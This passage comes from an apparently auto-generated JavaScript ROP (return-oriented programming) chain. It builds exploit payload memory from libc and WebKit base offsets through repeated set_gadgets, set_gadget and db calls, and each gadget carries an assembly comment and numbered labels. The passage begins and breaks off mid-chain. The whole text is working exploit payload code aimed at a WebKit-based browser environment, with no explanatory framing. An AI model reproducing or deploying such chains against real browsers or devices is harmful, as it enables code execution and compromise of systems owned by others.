libc_base+764760, //pop rsi
ropchain+411936, //L8655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8655:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+412064, //L8657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+412080, //L8658
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+412048, //L8656
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8656:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8657:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8658:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+412240, //L8662
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+412208, //L8660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+412224, //L8661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8659:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8660:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8661:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8662:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+412296, //L8664
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8664:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+412424, //L8666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+412440, //L8667
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+412408, //L8665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8665:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8666:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8667:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+412520, //L8668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+412536, //L8669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8668:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8669:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+412632, //L8671
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+412616, //L8670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8670:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8671:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+412712, //L8672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8672:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8673:
db([88, 0]); // 0x58
set_gadget(libc_base+144605,); //pop rdi
//L8674:
db([88, 0]); // 0x58
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+412856, //L8675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+412888, //L8677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+412872, //L8676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8675:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8676:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8677:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+413056, //L8679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+413072, //L8680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+413040, //L8678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8678:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8679:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8680:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+413216, //L8683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+413232, //L8684
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+413184, //L8681
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8681:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8682:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L8683:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8684:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+413304, //L8685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8685:
db([0, 0]); // 0x0
//L8626:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+413432, //L8688
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+413448, //L8689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+413416, //L8687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8687:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8688:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8689:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+413560, //L8691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+413608, //L8694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+413576, //L8692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8691:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8692:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8693:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8694:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+413720, //L8695+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+413712, //L8695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8695:
db([0, 0]); // 0x0
set_gadgets([
ropchain+413736, //L8695+24
ropchain+413976, //L8690
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+413792, //L8697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8696:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8697:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8698:
db([16, 0]); // 0x10
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+413872, //L8699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8699:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8701:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+413952, //L8703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8703:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+420168, //L8702
//L8690:
libc_base+764760, //pop rsi
ropchain+414016, //L8705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8705:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8707:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+414136, //L8710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+414120, //L8708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8708:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8710:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+414216, //L8711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+414232, //L8712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8711:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8712:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+414392, //L8716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+414360, //L8714
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+414376, //L8715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8713:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8714:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8715:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8716:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+414448, //L8718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8718:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+414576, //L8720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+414592, //L8721
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+414560, //L8719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8719:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8720:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8721:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+414752, //L8725
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+414720, //L8723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+414736, //L8724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8722:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8723:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8724:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8725:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+414808, //L8727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8727:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+414936, //L8729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+414952, //L8730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+414920, //L8728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8728:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8729:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8730:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+415112, //L8734
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+415080, //L8732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+415096, //L8733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8731:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8732:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8733:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8734:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+415168, //L8736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8736:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+415296, //L8738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+415312, //L8739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+415280, //L8737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8737:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8738:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8739:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+415392, //L8740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+415408, //L8741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8740:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8741:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+415504, //L8743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+415488, //L8742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8742:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8743:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+415584, //L8744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8744:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8745:
db([111, 0]); // 0x6f
set_gadget(libc_base+144605,); //pop rdi
//L8746:
db([111, 0]); // 0x6f
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+415728, //L8747
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+415760, //L8749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+415744, //L8748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8747:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8748:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8749:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+415928, //L8751
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+415944, //L8752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+415912, //L8750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8750:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8751:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8752:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+416056, //L8754
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+416104, //L8757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+416072, //L8755
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8754:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8755:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8756:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8757:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+416216, //L8758+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+416208, //L8758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8758:
db([0, 0]); // 0x0
set_gadgets([
ropchain+416232, //L8758+24
ropchain+416472, //L8753
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+416288, //L8760
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8759:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8760:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8761:
db([8, 0]); // 0x8
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+416368, //L8762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8762:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8764:
db([4294967252, 4294967295]); // -0x2c
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+416448, //L8766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8766:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+420168, //L8765
//L8753:
libc_base+764760, //pop rsi
ropchain+416512, //L8768
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8768:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8770:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+416632, //L8773
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+416616, //L8771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8771:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8773:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+416712, //L8774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+416728, //L8775
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8774:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8775:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+416888, //L8779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+416856, //L8777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+416872, //L8778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8776:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8777:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8778:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8779:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+416944, //L8781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8781:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+417072, //L8783
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+417088, //L8784
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+417056, //L8782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8782:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8783:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8784:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+417248, //L8788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+417216, //L8786
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+417232, //L8787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8785:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8786:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8787:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8788:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+417304, //L8790
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8790:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+417432, //L8792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+417448, //L8793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+417416, //L8791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8791:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8792:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8793:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+417608, //L8797
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+417576, //L8795
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+417592, //L8796
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8794:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8795:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8796:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8797:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+417664, //L8799
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8799:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+417792, //L8801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+417808, //L8802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+417776, //L8800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8800:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8801:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8802:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+417888, //L8803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+417904, //L8804
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8803:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8804:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
